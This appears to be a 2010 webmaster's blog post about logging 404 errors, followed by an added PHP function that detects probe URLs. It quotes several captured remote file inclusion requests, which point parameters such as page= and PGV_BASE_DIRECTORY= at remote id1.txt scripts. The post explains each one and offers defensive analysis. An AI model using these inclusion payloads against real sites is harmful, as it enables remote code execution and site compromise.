ErrorDocument 404 /404.php
Then I put this line into my 404.php:
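$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '(none)'; // the Referer header is often absent
mail('me@myserver.com',"$_SERVER[REQUEST_URI] file not found at mysite.com","Referred by: $referer\nREMOTE_ADDR: $_SERVER[REMOTE_ADDR]");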
What followed from there was a startling procession of mails showing me repeated waves of php injection and hijacking attacks. I intend to log interesting samples here:
2010 February 4
/main.php?page=http://qqe.ru/forum/Smileys/id1.txt?
This is apparently a random url sent in the hope that I may have a main.php file that will accept this remote page to display and do more mischief. I wager this is a signature vulnerability of some popular web software package.
//phpGedView/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://www.inmonservicios.com//id1.txt???
I do have phpGedView installed at my site. This is apparently an attempt to take advantage of the PHP setting register_globals=on to set the phpGedView internal base directory variable to a remote site, then do some sort of command line and file mischief with PHP scripts at that remote site. This is probably a known vulnerability with some phpGedView set-ups. The long-standing recommendation is to keep register_globals off, not on, because of this type of vulnerability. With register_globals on, HTTP GET and POST variables are registered as regular PHP global variables, which obviously can wreak havoc with the workings of your scripts. See wikibooks for a better explanation.
2010 February 11
//errors.php?error=http://www.cienciacompartida.org////id1.txt???
This one is guessing I have an errors.php file that will do something fun with the url they are providing.
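The samples logged above share one shape: a query parameter whose value is itself a remote URL. As an added example (not the author's code), the PHP function below, under the hypothetical name remote_url_params, picks that pattern out of a request URI so a 404 handler can label such requests; the last sample URI is constructed for contrast.

```php
<?php
// Added example, not the blog author's code. Flags request URIs in which a
// query parameter value is itself a remote URL, the pattern shared by the
// samples logged on this page.

function remote_url_params(string $requestUri): array
{
    // Split on the first "?" by hand: parse_url() reads a path that starts
    // with "//" (as two of the logged samples do) as a host name.
    $pos = strpos($requestUri, '?');
    if ($pos === false) {
        return [];
    }
    parse_str(substr($requestUri, $pos + 1), $params); // also URL-decodes values

    $hits = [];
    // Values can be nested arrays (a[]=...), so walk them recursively.
    array_walk_recursive($params, function ($value, $key) use (&$hits) {
        if (preg_match('#^\s*(?:https?|ftp)://#i', (string) $value)) {
            $hits[] = ['param' => (string) $key, 'value' => (string) $value];
        }
    });
    return $hits;
}

// The first three URIs are the samples from this page; the last is constructed.
$samples = [
    '/main.php?page=http://qqe.ru/forum/Smileys/id1.txt?',
    '//phpGedView/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://www.inmonservicios.com//id1.txt???',
    '//errors.php?error=http://www.cienciacompartida.org////id1.txt???',
    '/gallery.php?page=2&sort=date',
];

foreach ($samples as $uri) {
    $hits = remote_url_params($uri);
    if ($hits === []) {
        echo "ok       $uri\n";
        continue;
    }
    foreach ($hits as $h) {
        echo "suspect  $uri\n         parameter {$h['param']} carries a remote URL\n";
    }
}
```

In 404.php the same function can be called on $_SERVER['REQUEST_URI'] to mark the notification mail as a probable inclusion probe rather than an ordinary broken link.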